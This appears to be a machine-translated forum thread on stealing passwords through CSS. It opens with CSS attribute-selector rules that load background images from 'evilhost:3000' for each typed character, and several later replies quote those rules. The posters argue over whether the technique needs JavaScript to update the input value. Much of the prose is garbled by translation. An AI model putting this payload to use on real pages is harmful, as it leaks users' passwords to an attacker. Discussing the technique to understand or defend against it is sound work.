1

Topic: Theft of passwords by means of CSS.

It would seem that CSS it is safe to filch from the point of view of something... On the contrary, here a method to read and send on the server passwords: input [type = "password"] [value $ = "a"] {background-image: url ("http://evilhost:3000/a");} input [type = "password"] [value $ = "b"] {background-image: url ("http://evilhost:3000/b");}...

2

Re: Theft of passwords by means of CSS.

Hello, c-smile, you wrote: CS> it would Seem that CSS is safe to filch from the point of view of something... CS> On the contrary, here a method to read and send on the server passwords: CS> CS> input [type = "password"] [value $ = "a"] {background-image: url ("http://evilhost:3000/a");} CS> input [type = "password"] [value $ = "b"] {background-image: url ("http://evilhost:3000/b");} CS>... CS> will not work By default, it is necessary, that JavaScript at each pushing updated property value for an element input (like the React-appendix are quite often written in such style). But idea class.

3

Re: Theft of passwords by means of CSS.

Hello, vsb, you wrote: vsb> Hello, c-smile, you wrote: CS>> it would Seem that CSS is safe to filch from the point of view of something... CS>> On the contrary, here a method to read and send on the server passwords: CS>> CS>> input [type = "password"] [value $ = "a"] {background-image: url ("http://evilhost:3000/a");} CS>> input [type = "password"] [value $ = "b"] {background-image: url ("http://evilhost:3000/b");} CS>>... CS>> vsb> will not work By default, it is necessary, that JavaScript at each pushing updated property value for an element input (like the React-appendix are quite often written in such style). But idea class. 1) does not work 2) and . Intercept pushings on  and send an Ajax

4

Re: Theft of passwords by means of CSS.

Hello, loginx, you wrote: vsb>> will not work By default, it is necessary, that JavaScript at each pushing updated property value for an element input (like the React-appendix are quite often written in such style). But idea class. L> 1) something does not work Probably not so do. L> 2) and . Intercept pushings on  and send an Ajax Speech about CSS, instead of about JS.

5

Re: Theft of passwords by means of CSS.

Hello, vsb, you wrote: vsb> Hello, loginx, you wrote: vsb>>> will not work By default, it is necessary, that JavaScript at each pushing updated property value for an element input (like the React-appendix are quite often written in such style). But idea class. L>> 1) something does not work vsb> Probably not so do. L>> 2) and . Intercept pushings on  and send an Ajax vsb> Speech about CSS, instead of about JS. DOES NOT WORK! Make a site with page where your circuit works and show URL!

6

Re: Theft of passwords by means of CSS.

Hello, loginx, you wrote: L> DOES NOT WORK! Works. L> make a site with page where your circuit works and show URL! https://codepen.io/anon/pen/ddKPOZ?editors=0100 It  the code from page of documentation React.js with styles for a b c characters. For visualization color of boundary changes, in developer tools it is possible to see requests to example.com.

7

Re: Theft of passwords by means of CSS.

Hello, vsb, you wrote: vsb> It  the code from page of documentation React.js  about it  a script if it is that interception  and an Ajax - any  is not necessary but  affirmed that on bare css without everyones  works here and set an example on bare css without ! On the bare does not work as was to be shown.

8

Re: Theft of passwords by means of CSS.

Hello, loginx, you wrote: vsb>> It  the code from page of documentation React.js L>  about it  a script if it is that interception  and an Ajax - any  is not necessary It is on every second site now, if that. For example on a site  with billions users. L> but  affirmed that on bare css without everyones  works as Whom affirmed? I in the first answer of this subject wrote: "will not work By default, it is necessary, that JavaScript at each pushing updated property value for an element input (like the React-appendix are quite often written in such style)."

9

Re: Theft of passwords by means of CSS.

Hello, vsb, you wrote: vsb> Hello, loginx, you wrote: vsb>>> It  the code from page of documentation React.js L>>  about it  a script if it is that interception  and an Ajax - any  is not necessary vsb> It is on every second site now, if that. For example on a site  with billions users. L>> but  affirmed that on bare css without everyones  works vsb> as Whom affirmed? I in the first answer of this subject wrote: "will not work By default, it is necessary, that JavaScript at each pushing updated property value for an element input (like the React-appendix are quite often written in such style)." Then it is the full poppycock. On  a script without everyones css and  it is possible to intercept the password, the bosh full is shorter.

10

Re: Theft of passwords by means of CSS.

CS> On the contrary, here a method to read and send on the server passwords: What for such complexities? It is possible to poison simply the password on the server and to store it there in basis .